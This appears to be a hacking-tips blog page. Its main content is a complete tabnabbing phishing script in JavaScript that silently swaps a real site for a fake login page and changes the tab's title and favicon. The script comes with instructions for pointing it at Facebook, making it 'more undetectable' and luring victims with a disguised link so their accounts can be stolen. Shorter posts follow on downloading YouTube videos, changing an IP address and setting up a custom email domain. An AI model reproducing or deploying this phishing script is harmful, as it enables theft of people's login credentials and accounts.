var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anything.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

You can Also See My Older post Fishing Technique  

Read More

Download youtube videos without any software

This is simple trick which will allow you to download youtube videos without any software and in different formats such as mpeg4, 3gp, hd and many more.

    First Go to Youtube webpage.
    Then go to video you want to download.

       Example :  http://www.youtube.com/watch?v=_JAa3NvP6f4
 
Now add save before youtube and press enter.

       Example :  http://www.saveyoutube.com/watch?v=_JAa3NvP6f4
 
Now you will be redirected to a new page from where you can download video in any format of your choice
 
NOTE: In place of save you can also use kick

Read More

Change your IP Address Manually Easylly !

Hello  Visitor,

                     Today i'll Explain How to change your Internet Protocol address (IP address) By a simple Method.In my Next post i'll  show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take Few minutes but with some practice you can do this within a minute.


    Click on "Start" in the bottom left corner of the screen.
    Click on "RUN"
    Type in "command" and press Enter


      You should be now at MSDOS prompt Screen

    Type "ipconfig /release" just like that, and press "Enter"
    Type "exit" and leave the prompt
    Right-click on "Network Places" or "My Network Places" on your desktop.
    Click on "properties"


     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

     Right click on "Local Area Connection" and click "properties"
    Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
    Click on "Use the following IP address" under the "General" tab
    Create an IP address (It doesn't matter what it is)
    Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
    Press the "Ok" button here
    Hit the "Ok" button again


     Now you should be back to the "Local Area Connection" screen.

    Right-click back on "Local Area Connection" and go to properties again.
    Go back to the "TCP/IP" settings
    This time, select "Obtain an IP address automatically"
    Click on "Ok"
    Hit "Ok" again.
    Now you have got a New IP address.

Read More

Creat a Free secure Email Database Fast & Easyly !

Hello visitor,Today I'll explain how to create a Secure Email Database & anytime you control it.
You also can a email ID delete/Create.Maximum time we need a mail address for using
internet service.Maximum time we use yahoo,Gmail,Hotmail but you can't exactly Register
your username,exactly that you like,Because the username is already Exist.So today
I'll explain a 100% working  system that gave you a Email database not only a email
Address.Everybody can open mail under this database & you control it anytime.This mail
address support Microsoft outlook express or other mailing software.User also can login
the id by windows Live or Google.Let's go Easy,Simple,Free & Secure Step for this step.
       
 Step 1: A personal custom domain Ex: .com, .net, .tk, .co.cc(Use it for Mx zone record)
 Step 2: A Mail Hosting Provider Ex:Microsoft,Google or other service provider.
See The screenshot  & Follow the Simple Step.
U can also try our Mail service.
 

Get a free account @2daymail.co.cc

Sign up

Check e-mail

Read More